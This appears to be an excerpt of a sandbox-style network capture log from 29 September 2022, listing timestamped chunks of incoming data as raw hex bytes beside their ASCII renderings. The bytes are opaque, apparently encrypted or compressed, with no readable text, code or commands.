                                                                                                                                                            2022-09-29 12:45:15 UTC25093INData Raw: 0c 72 fd 94 25 7f 0b d1 8f 06 ba 50 b6 ae af 4c 00 57 f9 c1 5c e1 16 81 ed 89 e6 db 16 04 6d 20 fc 78 59 77 a1 56 72 08 27 3b 05 46 e4 b0 41 3d 75 8e 63 90 14 3c 67 6e 6b e0 2f 4d 20 33 aa 7a 03 30 5e 50 45 63 cd bd f5 b8 2b 71 c8 f6 34 dd 00 28 9a cd 6a c0 5c 26 55 62 67 ec 1f ba 83 75 ce 2a b4 99 09 7d 96 1c 88 c0 b8 6b 75 b8 81 3c db 9a c5 61 63 fc f3 8f b8 28 cc 9b 48 cc d0 5e f8 03 37 dc 4c 40 5c 04 06 73 7e c1 46 da b7 e7 28 96 55 5b e4 d9 16 86 ed 2a 5e c8 9b a6 2a e5 f9 e5 7c 28 bc de b2 d8 43 87 1a 5f 40 71 63 b8 f7 8c ef e9 9f 41 3d 80 c4 01 7c fe 11 c1 c2 bc 6b 9e 9e 5c 5f fa 60 17 74 45 a3 15 dc 29 57 f0 ba 91 8e 7e ba 2d 46 44 41 27 39 dd 6f ef 13 62 da 0f 47 3a 37 f5 01 b2 9a 47 97 49 ad 75 a9 1c e7 33 7b 5a a2 56 88 20 aa 4f 1d 9e ba 9e 02
                                                                                                                                                            Data Ascii: r%PLW\m xYwVr';FA=uc<gnk/M 3z0^PEc+q4(j\&Ubgu*}ku<ac(H^7L@\s~F(U[*^*|(C_@qcA=|k\_`tE)W~-FDA'9obG:7GIu3{ZV O
                                                                                                                                                            2022-09-29 12:45:15 UTC25109INData Raw: 0d 72 02 c5 bc c5 95 42 98 ca 55 86 1b c9 21 6f 5f 7a b7 2b 60 ee 04 f8 45 48 a8 dd c2 59 a5 55 94 5d 14 9d d8 e2 b6 b0 da be 6a 78 9f 44 61 e2 87 fd ca e4 10 56 49 a3 96 9a 75 5d b4 69 1a 07 d9 75 3b a7 8f 34 07 c8 4f ff 59 d6 5e cb 7a a1 4c ff 94 b1 c3 ee 60 80 e3 7f 44 e0 35 e2 e9 d2 a6 95 32 39 e9 00 53 3b 27 64 56 c5 6a 0a ac 70 33 b3 51 68 b2 4a d5 42 53 13 91 f7 e7 a7 50 9c a9 12 fa 53 2d 13 a9 d8 4a 54 f3 cd 91 d5 34 07 f1 14 a2 51 bf 54 e0 73 03 12 26 50 87 d5 ce 55 09 88 bd 21 75 3b 40 d9 0c 91 f2 a1 90 8b 04 c9 f8 d8 79 c5 de cc 5f a1 7a 2f d3 ed 7f 2f 69 5a 41 5c 2a fb ea 65 92 5a ff 22 1b 68 8b 08 92 4e 5d bc 71 32 e1 35 72 61 26 38 28 0f 24 7b 00 e4 e7 e8 a8 29 c8 31 64 25 3f 26 8c 77 f1 b9 73 25 1e 7c 96 82 f1 a2 a1 40 28 de 45 95 f8 57 ff
                                                                                                                                                            Data Ascii: rBU!o_z+`EHYU]jxDaVIu]iu;4OY^zL`D529S;'dVjp3QhJBSPS-JT4QTs&PU!u;@y_z//iZA\*eZ"hN]q25ra&8(${)1d%?&ws%|@(EW
                                                                                                                                                            2022-09-29 12:45:15 UTC25125INData Raw: ce 83 0f 41 7c 9f 58 af 58 bb 8a cb dc 26 2b 79 11 06 24 25 16 0c 38 15 ab 2f b4 fa 4f 75 b9 b9 fa 76 fe a7 ff 7b fb f6 91 76 38 a6 20 96 4d 57 91 1f ef aa 50 78 8b 7d 38 39 f0 b7 be 00 eb d3 f9 b9 92 da 54 44 c3 ef 8e d9 e1 17 d7 d5 7d 67 8e 08 a6 74 3f 78 5b 78 96 89 24 97 44 11 cc b3 64 d9 5c 57 a6 30 7d 09 dc fa 6e b0 c6 14 79 99 10 9f 18 10 d4 41 3e 2a 4e f4 7d b2 ff c0 79 b8 fa 99 80 f0 50 d7 86 fe e8 a8 41 b0 e9 a4 0d b5 27 4e de 15 d6 c0 dc 7b 54 99 2d b0 cf 38 36 32 69 42 8d f0 24 eb 72 ad 34 69 1e 0d da bc 41 e6 13 47 d2 17 3d 48 89 6f 7f 36 28 e7 de 4c 7e 54 63 15 08 43 5b 4f 71 d1 3f 55 a0 0e 53 8f 94 07 e4 17 d9 3a a8 76 6b 64 7d bb 81 e2 17 c7 e6 ae ce 4b 4e 1b c6 ee 96 87 8d f4 3f bb 5c c3 9d 70 62 75 9a c2 9f 1b de 1a 93 5e 17 17 bf b3 08
                                                                                                                                                            Data Ascii: A|XX&+y$%8/Ouv{v8 MWPx}89TD}gt?x[x$Dd\W0}nyA>*N}yPA'N{T-862iB$r4iAG=Ho6(L~TcC[Oq?US:vkd}KN?\pbu^
                                                                                                                                                            2022-09-29 12:45:15 UTC25141INData Raw: 83 3e 41 41 59 02 c8 f7 21 46 4c 1a bf 16 55 7e dd ae 14 7c 2e 84 b4 b2 11 2f 19 76 40 76 5e 84 15 0f a4 f1 18 c1 c9 e6 a7 c7 3e 42 cc 4b ef a5 10 79 32 c7 d9 a7 3b 0b fe f9 00 01 a6 99 f4 5e f5 00 4a db 09 7b 8e aa d4 6c c3 19 a0 cb fd 40 20 af 3e c9 87 77 21 af 7d 44 0b 0e 8e b7 95 ff 6f ac 6d cf c0 47 f9 18 a3 5a b9 f5 f7 6e e4 42 bf 0e be f3 ff 45 bc 9e e7 a6 3a e0 08 7a 1c 8e 89 d3 e6 aa 90 73 01 ce 84 0d cb 76 bb 8b fb 10 28 94 7b a7 d1 1a 7f 51 64 31 bd 49 02 65 8e bf 1d fc fb 32 d5 95 78 d8 6b 37 34 af 9e f8 82 9d dd 2f 48 40 7a 1c 01 0b b8 9f 70 5d 3a 2f a7 0a 73 31 87 3f c4 d9 bb b4 f4 d3 e5 e0 75 51 dc bd da f7 fb 3c 61 bd 80 2b 4c 7a 69 3e ac 0e c2 bb 4b a9 9f 51 8f f1 c9 2d 4e ec 9d dc b3 b6 97 b5 75 7a dc c5 c2 c5 9b 78 cf e8 c1 59 ae 93 be
                                                                                                                                                            Data Ascii: >AAY!FLU~|./v@v^>BKy2;^J{l@ >w!}DomGZnBE:zsv({Qd1Ie2xk74/H@zp]:/s1?uQ<a+Lzi>KQ-NuzxY
                                                                                                                                                            2022-09-29 12:45:15 UTC25157INData Raw: 29 a1 01 cb d5 c3 7d d7 6a cf 72 72 db 5b ad 21 d3 96 74 49 18 97 37 20 3a cd 4f 5f 19 68 7f 43 d7 2d e8 e3 22 eb c6 5f 5a e6 fa b6 1a 93 b8 ea 0e 37 78 90 ab 74 a5 fa 3a 99 c6 eb 66 8e f0 8e 69 cf 28 10 2c 80 96 15 f7 27 2a 62 72 99 d0 7a b5 9b 38 ed 58 69 c0 db 58 be 5c 63 4a 83 f7 f8 ce 8b c5 b4 63 85 8b 9a 4e bd a7 e3 86 92 c1 ce b3 8f 3e 71 06 69 1c 1c f0 7a f5 9a 42 b7 f6 c6 f5 fa 87 76 52 b8 4e ca d6 0a 0c 1a 00 40 eb ac 30 9f 12 cc 0d 93 76 9d d7 20 c4 45 9f 09 f7 8b 3b 3d c7 ff b6 7f 71 92 4c df a5 8e 3a 32 9b d5 5f bc ee 04 bf 97 aa 32 59 db df 05 56 cb d8 f2 08 8d f8 a5 ae 0d e9 05 48 ca cb b2 3b 22 19 93 a6 d9 c6 43 17 46 a8 69 c6 32 60 a1 8e 5d 42 94 bd 23 17 fd bd b2 f1 e6 0e 03 79 a0 55 5c 46 f4 80 14 3a 6a 18 43 2a ef 03 8e 22 0f 4f 55 12
                                                                                                                                                            Data Ascii: )}jrr[!tI7 :O_hC-"_Z7xt:fi(,'*brz8XiX\cJcN>qizBvRN@0v E;=qL:2_2YVH;"CFi2`]B#yU\F:jC*"OU
                                                                                                                                                            2022-09-29 12:45:15 UTC25173INData Raw: 8b 23 b0 0f 8c 32 34 78 4b 4d 54 1d 8b a4 8c ba 38 23 5e 0a fb 30 f6 88 10 94 c7 2c 80 78 b9 79 fa 9c 12 ea 0a 3f 84 c3 09 0a e6 67 16 ce 79 04 ae 7b 89 60 e5 62 97 1a 04 cb 2f ac 33 2f 45 9c 12 e0 1d 2d d8 e3 db c6 d3 6d 1e 61 15 f5 df ed 15 cd 9f 9b 97 96 fd c1 c2 a5 71 1f ef b3 09 62 ef 84 6e db b8 cd de 27 f7 8d 42 0b 4e 60 1d d6 f7 7c 7d 25 a1 72 82 2f 80 a5 26 5e a9 d6 ae be 46 1e 08 5e bc 5e b5 07 37 d7 57 4d c8 74 9e a1 e3 0a 55 dc 74 fe 9a c3 ad 62 ba 30 44 ef 99 4c 68 30 aa d2 b1 07 e2 a6 6a 09 01 f3 eb 19 4d 98 22 59 6e 00 07 4a fd 07 6c f5 1a 47 0c aa 71 9b 45 22 f7 eb 20 75 9b 0a 02 77 a7 fa f3 5e e9 bb a2 30 cc 67 94 4a ce 4b 98 25 f9 ae 9c 27 18 d3 1b 30 8d d1 6f ef 6e 5c 12 f6 7f c2 3e 10 36 a4 c6 b2 7b 03 0a 93 a9 fc 2c d5 1e 09 5f f1 3c
                                                                                                                                                            Data Ascii: #24xKMT8#^0,xy?gy{`b/3/E-maqbn'BN`|}%r/&^F^^7WMtUtb0DLh0jM"YnJlGqE" uw^0gJK%'0on\>6{,_<
                                                                                                                                                            2022-09-29 12:45:15 UTC25189INData Raw: dd a1 b5 81 5a 98 e3 96 9d c7 fd 2f 31 21 a9 5e 21 39 87 8f b9 fd 33 34 bc a2 98 ea 4c 47 b7 02 28 80 eb 62 7d 8d 93 66 e1 cb 2b 07 e2 a8 84 77 10 0a 24 60 b9 9f 02 77 b3 0b 86 4f cf 9e e9 ca 25 71 5c 92 aa 70 db d0 85 51 63 20 a1 f5 66 2b 20 c8 ca 86 9e c4 66 0d eb 54 93 4f 1b 88 59 95 56 7d ae 98 87 c4 d0 9a 69 07 75 89 61 76 a0 98 70 cd 98 dd 3a 36 f7 60 e9 57 29 18 65 c2 67 b5 3d 07 b9 92 5e e2 9e ff f0 50 aa 05 5a a6 aa 78 d0 6e 17 97 d2 6d 55 25 a7 b1 90 2c 35 4d d4 77 fb 87 30 ac ae a6 c1 88 24 5d 51 dc 11 87 1d f7 a6 e2 14 00 e2 24 6a 48 6f c1 46 b1 e0 91 95 ab fc 95 cf 60 46 ee 92 75 66 4d 60 39 51 d2 27 02 5d 70 34 4f 93 c3 fa 10 7d 60 d3 76 ca 3e cd ee 4f d0 06 95 a1 a3 40 83 53 e1 cc d2 0e 91 66 ab bf f2 cc 6f 69 07 4a b4 e4 ec d5 20 e3 7c 80
                                                                                                                                                            Data Ascii: Z/1!^!934LG(b}f+w$`wO%q\pQc f+ fTOYV}iuavp:6`W)eg=^PZxnmU%,5Mw0$]Q$jHoF`FufM`9Q']p4O}`v>O@SfoiJ |
                                                                                                                                                            2022-09-29 12:45:15 UTC25205INData Raw: 0f 0d d9 e1 e6 05 9d 8a 14 42 7d 23 aa 3f 61 99 38 6f 8a 19 3d 77 e4 7a 75 00 0d e8 6c 0d a4 6e 71 bf 50 8b a8 16 d3 00 c8 33 55 e8 83 31 0c 07 aa a4 b1 1e 97 0f 3d 4d 49 d4 b2 0e 98 f0 53 ee cc c7 7b 7a 7b eb 4e 68 7b 85 3d 0a 00 88 89 8c 72 27 09 07 1b 03 4d 98 b0 80 60 38 85 8a 92 41 1c 7d 82 41 8d 9b fb 78 d0 ad 3b 3d 04 1c 18 2b cc d3 80 bd f3 6c b4 1f df a0 c6 97 6d ea 9b 35 6b 79 ae 0c d9 47 f7 11 ce ef 96 76 3f d9 19 f2 2d 2d 27 d2 6c 05 13 5d 05 31 51 cf 45 7d cc b8 93 45 e8 a4 13 5d 12 56 13 3a f1 78 58 7a 9c 15 c7 c2 ed 7c 41 28 b0 a3 27 33 78 02 05 ed 10 24 57 c1 37 2e 9f 5b b8 8b 0d b5 89 b2 9e 5d ca f0 ae 03 76 8f 01 7b 0b 28 fb 51 52 9f c0 d1 8c 27 68 fa 5b 11 5f 5a 9b 75 a3 c6 70 5f f6 43 9b cd 93 ae cd 77 ec 3e 77 65 52 f1 f5 d5 65 8e 7f
                                                                                                                                                            Data Ascii: B}#?a8o=wzulnqP3U1=MIS{z{Nh{=r'M`8A}Ax;=+lm5kyGv?--'l]1QE}E]V:xXz|A('3x$W7.[]v{(QR'h[_Zup_Cw>weRe
                                                                                                                                                            2022-09-29 12:45:15 UTC25221INData Raw: 5f 09 4e 89 60 b4 0b 9b fc f3 53 50 6e a5 f8 e3 d4 71 51 32 d1 dd 8f 16 2f 3b 95 43 f2 0a 62 4c 98 94 ad 8b 8a 47 68 aa 39 a3 cd 5d 52 45 77 04 8f 6e 06 37 ea a9 8a 9f 3e bc d7 f7 f5 39 08 e2 60 b5 88 d3 ac c8 91 b6 13 34 5a 07 66 a0 0d 6d c6 d0 1f 6d 8f df 06 a5 9f 04 f0 01 80 57 42 80 c7 53 01 f2 2d 13 cc 93 b5 8e 54 c9 46 64 2e 8a 93 78 d6 8b ad cf e1 bd 56 0f 02 03 c6 c8 2e cb f6 2f 54 dc e6 31 f9 87 22 8d 49 0f c9 8e 07 69 f0 f0 8d 2e e3 93 d7 ae f0 d9 11 86 9e a6 44 e3 62 7e c8 08 d3 9b d4 15 43 5b cc 75 56 ed 72 a9 11 e0 36 c9 a9 fe 9d 2f 9d 67 20 c0 7d 49 e1 e6 4a 80 69 c8 d0 47 ae 4d b6 c8 73 b9 61 9c 5e c8 1f d3 97 ca 0b d4 57 93 52 b2 89 9a 8f aa 97 e1 10 3e a3 1d 54 42 39 af 32 5c 26 a9 4e 79 b4 ad 84 f1 d0 e2 b5 6e 83 66 58 22 a4 eb 96 3b f5
                                                                                                                                                            Data Ascii: _N`SPnqQ2/;CbLGh9]REwn7>9`4ZfmmWBS-TFd.xV./T1"Ii.Db~C[uVr6/g }IJiGMsa^WR>TB92\&NynfX";
                                                                                                                                                            2022-09-29 12:45:15 UTC25237INData Raw: 3f c1 0d dd ae c6 88 23 3c d1 5e 54 b7 d8 47 e5 9d 43 21 52 a3 db 11 59 3c 09 52 69 07 56 b3 4e 05 82 2a 05 34 d5 be 29 aa 42 55 c1 cf 2c 23 b9 6c 66 c4 c9 2f 83 90 3e 94 6b b8 ef 9f 1e 31 32 fc 76 e3 80 24 6a f1 c9 0c 3c 2f 01 cb be 53 11 b6 af c5 0c 05 52 f9 66 8d 03 bd ec 8f 14 d3 69 8c ae 6a 2c 6e 73 b2 a8 5f cf 93 f2 c2 64 26 b3 0d 0a 96 12 ab d1 dd ee 69 20 12 55 d4 f8 53 c3 db e4 e3 5a 21 1d e9 34 ca a9 7f 03 ef 17 99 9f b0 05 32 24 4e 3c 46 6a c2 22 2f 25 18 64 d5 17 a3 8b ea 06 21 03 1b a0 13 34 b9 48 61 15 a0 23 f6 f0 26 85 3b 51 9f ae 7a 72 ba 82 81 58 ae 79 e4 6a 1a fd c5 4c 39 57 85 f4 2b 28 4e a9 f2 84 4f 40 df 7b 31 ea e2 18 e3 58 c1 06 34 e0 21 e3 66 8b 36 a7 69 77 9a a9 6c 4d 63 d5 5f d9 6d ad 8d 38 88 b0 56 f7 fe 71 14 68 b8 fa aa 08 5f
                                                                                                                                                            Data Ascii: ?#<^TGC!RY<RiVN*4)BU,#lf/>k12v$j</SRfij,ns_d&i USZ!42$N<Fj"/%d!4Ha#&;QzrXyjL9W+(NO@{1X4!f6iwlMc_m8Vqh_
                                                                                                                                                            2022-09-29 12:45:15 UTC25253INData Raw: af 3a 5a 03 b4 81 76 48 7a 5c 30 35 d3 3f fb 40 d2 ee 23 92 96 5c 51 ef 86 1a 14 a9 16 7f ca 46 38 ea 8e 8e e4 e6 f5 40 95 97 27 f0 98 07 ed 49 a8 de 72 14 5e 98 83 2d f4 70 f6 fb 6a 2f 69 24 e6 5c 70 39 3e ff d3 0f bf 39 9c 58 51 10 b5 52 09 9b 38 6a a6 9d 57 1b 11 8e 21 24 9e 6a b4 01 9b d1 fc 8c d4 14 0b 51 15 a0 04 26 1c 1d ec c8 2b 48 70 fa 99 ae f2 cd 74 a1 fd 46 60 dc 3a 41 42 cd 15 bc b2 a6 2c 69 39 11 cd ae d0 71 3e 1b 48 7a 06 26 3a ba 69 b1 ec bb fd b1 57 7a 1d 66 c4 51 0c fb 94 4d cb ec 7c 1b 6a 2d c0 61 99 2c 48 66 9f d5 23 85 34 dc 96 fa 87 4a 0b 44 65 08 fd ec 20 dd 14 39 15 40 f5 96 fa e4 22 81 1d bf 7a 47 d9 00 a5 51 6d df cb ed b5 21 29 78 ba 2a eb 48 f7 6a 9c b0 5a 24 65 19 d3 13 a2 9f a4 e3 63 85 65 0b 60 62 db 36 ef 87 fb a4 78 3f fe
                                                                                                                                                            Data Ascii: :ZvHz\05?@#\QF8@'Ir^-pj/i$\p9>9XQR8jW!$jQ&+HptF`:AB,i9q>Hz&:iWzfQM|j-a,Hf#4JDe 9@"zGQm!)x*HjZ$ece`b6x?
                                                                                                                                                            2022-09-29 12:45:15 UTC25269INData Raw: 1d b1 0e 56 6e 3c db 9f 57 12 05 1b 67 4f 1b ec 43 d7 a3 94 97 bc 6c 8c a8 82 91 be f0 c6 76 03 aa 19 03 1b 42 ce 97 28 32 64 bf e7 7b e4 96 16 61 51 9f 3e db b7 5b 24 d3 a8 b5 28 95 c0 ef a8 94 10 25 ce 60 98 7b 2e 7c 73 b3 03 87 57 be e2 4a 8e 93 66 a8 70 40 1f ee 82 43 47 42 92 ae ba e1 9c 54 86 31 a3 c4 36 10 9e ab 7f b6 f5 d9 a9 08 06 38 dc 0f 14 3d 99 dd 23 e3 ad 27 a9 99 64 8a 21 b4 ab a1 59 c8 8c f0 4e fc fd 78 d6 47 09 08 73 88 c3 dd e3 96 e9 85 38 f3 f9 8f 86 f1 a7 50 db 28 cb 07 62 ac 02 ae 7b 1a df 33 76 61 be 98 12 2c 5c e7 41 7c 35 36 a4 88 4a 3a 75 1d 92 5d d5 bf c4 7d 9f 74 67 fb 4e fb 83 e6 fd 91 dc cc bc 02 ff eb fb f1 e3 d3 84 d7 98 64 1c 0c 59 a7 c6 0d 97 2b 2a 41 9b dc a1 16 f4 a9 75 f4 50 23 31 a3 9a 62 f2 36 4d a9 b6 a0 ed 34 37 f0
                                                                                                                                                            Data Ascii: Vn<WgOClvB(2d{aQ>[$(%`{.|sWJfp@CGBT168=#'d!YNxGs8P(b{3va,\A|56J:u]}tgNdY+*AuP#1b6M47
                                                                                                                                                            2022-09-29 12:45:15 UTC25285INData Raw: 24 39 2a 53 20 d6 3b 46 bd 26 e1 3c 33 e7 43 dc ff f0 37 c4 e4 f1 64 53 9b 21 ae f1 2b b3 9e 85 64 a9 f0 96 88 df 4c 49 d2 86 36 47 3b 4a 88 a9 96 17 9c b9 0a 87 f4 20 2e 1d 72 1e b5 f5 d0 d3 2b 81 86 36 2d dc 1e eb 26 5e 1c ef 43 f4 0d 7d 62 3d 2f 37 3d a5 b6 4a ba c7 3a d5 9c 8f d2 2f 61 8f 11 1d 24 89 1d 82 d5 35 8a 6b 1c 1b 40 65 0b 00 24 e8 b1 1d 90 39 e5 a9 3f 97 67 4a 58 27 95 12 78 7c 67 a9 ed f7 8a d4 00 c0 fd 25 43 81 1c 8e 2f f5 ab 43 58 68 a0 fc 98 d7 4f 5b a5 68 39 2a bb 70 07 b6 7b 7a cc 65 e5 d4 70 93 24 b2 a1 3d 5e 7b 6e 78 4b f9 1d 2f 11 21 01 8e 43 a5 55 13 56 60 dd 03 0b 05 a6 11 cb 70 f9 f2 4e e7 88 ef 5e b6 47 d6 27 7f 62 c4 a6 f6 3d 49 f2 68 50 09 87 da c0 f7 ed a9 46 e0 d2 5a 46 86 54 5f f7 e9 4f 52 5f 1b f3 4c 7d 73 70 50 af d7 5f
                                                                                                                                                            Data Ascii: $9*S ;F&<3C7dS!+dLI6G;J .r+6-&^C}b=/7=J:/a$5k@e$9?gJX'x|g%C/CXhO[h9*p{zep$=^{nxK/!CUV`pN^G'b=IhPFZFT_OR_L}spP_
                                                                                                                                                            2022-09-29 12:45:15 UTC25301INData Raw: ca eb 33 85 4a 51 d7 c4 e5 67 41 d0 9e d6 d6 ac bc ce f9 2f c1 37 7f 21 58 76 58 71 fd 75 37 56 05 38 9f f6 3d a5 24 09 d0 c0 41 ff 1f e5 2d 8f c3 55 1c 56 68 ba 3a 97 ef eb 9b db 47 48 71 b5 11 60 80 19 ae a9 2f 97 75 c5 ef 37 26 76 48 61 79 ec b6 5d e8 c0 ee ae bb 67 8a a6 fe a3 be 96 15 4c a8 49 a2 3e 0d 9b 00 cb 64 1b bb f0 fb dd 0d ed 90 73 48 c2 4e bf b8 78 4a ef a3 08 25 77 db b2 95 fa 01 2f f5 db b7 9d 33 f6 18 e6 2f 61 e0 e2 64 f8 d9 a4 9f 8e a6 b9 7b 34 1f 83 60 ef 3b a2 f4 4e 48 7d d4 f6 7a e5 36 3f 5d 7b c5 1b 56 db b5 20 6b d4 17 1f d0 25 17 c7 82 71 4c 85 f4 dd 98 8b 77 42 5f ac 82 78 78 bc d7 b5 64 94 b9 ef 45 2e b2 47 9c 32 54 cb 03 c7 53 9f 2e 5b 50 1b d2 01 53 61 0b 8d 61 67 be e6 8f cc 06 e0 42 36 b4 53 21 2e 5d 31 ee b6 e4 72 16 66 d0
                                                                                                                                                            Data Ascii: 3JQgA/7!XvXqu7V8=$A-UVh:GHq`/u7&vHay]gLI>dsHNxJ%w/3/ad{4`;NH}z6?]{V k%qLwB_xxdE.G2TS.[PSaagB6S!.]1rf
                                                                                                                                                            2022-09-29 12:45:15 UTC25317INData Raw: 79 77 32 71 48 fb 3f 17 ce b5 69 88 e3 ae 62 d0 e2 bc 6c 49 ed 25 7d 13 d9 07 d3 39 f3 04 ce 97 00 6a 12 e4 66 d9 13 d5 44 01 a5 34 07 9b 8e ad 81 5b 3d c4 94 5f 38 d5 93 c7 88 dc 36 0e da 06 88 10 0f 77 cb 1a de a6 e0 53 d7 62 63 6b e6 6b d7 16 61 b7 60 cc 98 87 3e 17 95 c4 77 73 18 d2 ed c1 fa 61 04 5a 85 22 66 21 41 9d 8a 78 aa 7f 9c 65 7e 85 b8 f0 1b 5b 9d 5f 11 a6 bb c5 d2 a4 ec 4f 9d ea 5b de dd f1 ae e5 4a 80 d1 30 12 31 85 a1 5f 4c 30 a1 1f 29 45 5a d0 0c dd d1 5c c9 70 d2 e7 12 17 34 db 36 4c 60 34 a2 42 10 4b f2 d4 99 56 1a 88 09 c8 df 88 42 b0 7a 70 24 3e 9d 39 24 2e 2a 4d 01 56 44 d4 3e d8 9e 70 f8 63 65 42 77 9a 7f 75 1d de d5 b6 30 56 f2 11 a9 1a 9b 00 f2 0c ac 33 20 3f 3a dd 27 49 0e d5 9a 8b 3f 11 68 ef a8 28 7f ba bc fa d6 7a 0a 44 c1 61
                                                                                                                                                            Data Ascii: yw2qH?iblI%}9jfD4[=_86wSbckka`>wsaZ"f!Axe~[_O[J01_L0)EZ\p46L`4BKVBzp$>9$.*MVD>pceBwu0V3 ?:'I?h(zDa
                                                                                                                                                            2022-09-29 12:45:15 UTC25333INData Raw: 94 b1 68 c3 c9 7e 40 3a 22 06 e1 56 95 87 c3 e8 ee 14 b6 f8 bf 9b 67 68 a4 fe 8d 6c 1b 22 dd b0 24 c5 8b 5f 6f ec c1 21 cf b6 70 67 92 62 04 86 9c 68 81 fb 7b e5 ce 02 89 ea b0 8e 7b 1a 02 a9 d9 3a d7 9d 6d ef a0 1b cc 62 ff c4 1d ff 13 09 38 de 81 ff 73 37 af 90 f5 b0 20 7b a9 e3 2a f8 3d ff 96 82 35 7c 91 aa 77 62 db d5 02 31 94 48 88 83 89 2c 46 bc 55 d3 db 62 27 b9 df 1e db 1f 7e 64 b9 17 f3 b5 8a 97 9f 3b 25 6d 97 4a 43 b2 d8 bc d9 65 40 e8 b2 d9 67 89 fa 44 9a 01 2c 22 f1 37 7b c5 e4 20 69 56 d6 6e 8f 32 de 29 18 ba 0b 60 52 71 1f 8e 52 d9 8b fe 18 ea 03 aa 74 a3 d3 99 f8 01 98 09 2a f7 0a 64 d1 8e e4 ee 0f 8c 8b 19 86 94 5f ef b0 37 c0 5c 96 e2 cc 2f 5b 05 e8 cb a0 e6 6e ef c5 e4 4c af d7 cd b5 a1 96 51 dc 2c 0a b1 8e c5 3c 24 73 01 86 2b a9 36 11
                                                                                                                                                            Data Ascii: h~@:"Vghl"$_o!pgbh{{:mb8s7 {*=5|wb1H,FUb'~d;%mJCe@gD,"7{ iVn2)`RqRt*d_7\/[nLQ,<$s+6
                                                                                                                                                            2022-09-29 12:45:15 UTC25349INData Raw: fc 60 2e 12 86 f6 63 a8 aa 32 23 bc b7 15 ab c2 f0 e4 34 7a 55 d9 29 33 80 69 91 92 0d 86 f1 6e 51 8e ab b9 28 ac 01 8b 34 9e 59 5e 4c 05 44 07 82 32 1b 9c 80 32 05 c1 05 55 4f 08 ce c4 1c 7f 76 6d 3e e6 d2 f2 df f9 8d a9 f6 48 2d cd cc 4a 13 0b 26 1f 2e 75 6a 35 3b 28 37 e3 e6 73 47 13 7a ce 8a 0e 8d 8d f2 f1 7f 53 af c7 58 17 b3 bc 0b 32 52 61 f7 2b ef d5 e0 5a 52 5e da 25 43 5f a6 fe ea a3 9f 74 83 40 12 d4 95 81 8c 2f 55 1a de 14 64 5e 34 b2 5f 28 0c b8 07 0a 32 1b 86 de c9 7f 4d e1 23 8f b2 36 8e 3c 4e a4 b2 d2 3c 47 9e 7d a8 96 ce d6 62 58 f0 19 fd 9c 34 8b 50 c0 cd ac f4 99 cb 71 e1 a5 6b 5b 29 fb f7 f0 3b 37 65 df 3e a0 72 c5 f8 14 3e bc 6d e2 b0 bf b3 c3 a7 e8 70 b9 88 f6 12 fe 69 db b1 01 61 e8 2a fc ab d1 52 b3 93 12 e1 0f 8e 4d c7 b2 3c 31 b8
                                                                                                                                                            Data Ascii: `.c2#4zU)3inQ(4Y^LD22UOvm>H-J&.uj5;(7sGzSX2Ra+ZR^%C_t@/Ud^4_(2M#6<N<G}bX4Pqk[);7e>r>mpia*RM<1
                                                                                                                                                            2022-09-29 12:45:15 UTC25365INData Raw: df 94 ce 24 73 53 6f 67 b1 0f dd e0 ce e4 00 78 da f4 57 f8 ce 90 32 4e e4 c8 fc 5d 44 0f 25 4e 87 81 f8 10 eb b8 a8 c4 d6 a3 92 81 79 43 89 6c c8 14 df 79 04 f2 c7 1c fd 85 d0 c2 cd 20 13 e5 49 41 2c 72 97 67 42 0b d4 7b 68 f2 ef 2d d7 2b 35 3a 4d 79 fa 67 96 5a e0 22 c3 51 ed ab f8 22 c5 5a 21 64 a8 d9 69 20 c3 22 b8 d4 0d 63 2b 9d 1e 0c 16 05 51 9a e6 b8 95 96 3e b4 0f 81 55 58 35 ba f2 30 cf a8 7b 23 57 61 f6 90 4e 70 82 fa 61 3a 47 fd 15 08 a0 52 61 2b fc 33 ad 2c 68 f9 7f eb 0b e0 fe f1 54 c9 0a 17 fc ed 3d 7a 60 96 29 26 ae 07 0a cb a5 8e 1b b4 23 57 0c 55 7b c3 5b e9 38 36 a9 50 12 88 1c f4 cc 86 43 d9 80 ca 6a 7a 48 82 3b 7e 54 db b0 d8 97 97 d4 25 e4 11 ef 5f c2 e9 0c cd b6 92 79 dd 07 38 1f f8 3a c2 e9 1d 29 06 89 f0 98 cb 32 86 3e b1 92 8c 72
                                                                                                                                                            Data Ascii: $sSogxW2N]D%NyCly IA,rgB{h-+5:MygZ"Q"Z!di "c+Q>UX50{#WaNpa:GRa+3,hT=z`)&#WU{[86PCjzH;~T%_y8:)2>r
                                                                                                                                                            2022-09-29 12:45:15 UTC25381INData Raw: 87 f8 e0 cb e8 3e b8 36 b0 f8 f9 99 d1 c0 51 d8 04 8a 0b c4 56 0c 00 af 85 01 90 48 e8 41 1b 1e 23 c7 74 d7 10 b9 62 22 7b ea b8 88 9f e1 e9 db 3f 08 a0 00 6c 27 c1 c4 61 3a ae ef 04 4b 95 54 2c f7 4e 90 4e 65 0c 4f df 0b 8c df c9 84 bc 6c c8 2b b5 8f 35 b6 06 f4 48 30 cb 73 b5 fd 2c cd e0 8e 2c 8f 4d fa 04 fe 37 c5 a0 f1 e6 ea 9e 3a ad 13 9e e3 f0 8c c6 0c 4e 8c 80 91 0b 53 67 2c 88 23 8e 82 28 a1 4c db 96 52 5d 23 47 a1 97 8c d8 7e 40 03 4f 5c bc 29 01 3b 9d 7f 63 2b 86 d5 e3 4c 1b 9a 67 c9 55 7a d2 6b b1 4c 68 08 62 fb c9 42 4c b4 da 69 f6 f0 97 32 bb fe d4 95 97 bb b0 4c 30 8b c4 a2 2d a9 42 e2 4e 39 48 e8 8b 94 ba 80 5b 29 a9 b0 92 10 58 a1 4f 66 3d bd 2b a9 52 40 a8 b7 b8 47 43 3d d8 ae 7a b6 52 75 6d 68 93 7a 0b 15 71 16 bd 40 14 94 26 69 45 06 7e
                                                                                                                                                            Data Ascii: >6QVHA#tb"{?l'a:KT,NNeOl+5H0s,,M7:NSg,#(LR]#G~@O\);c+LgUzkLhbBLi2L0-BN9H[)XOf=+R@GC=zRumhzq@&iE~
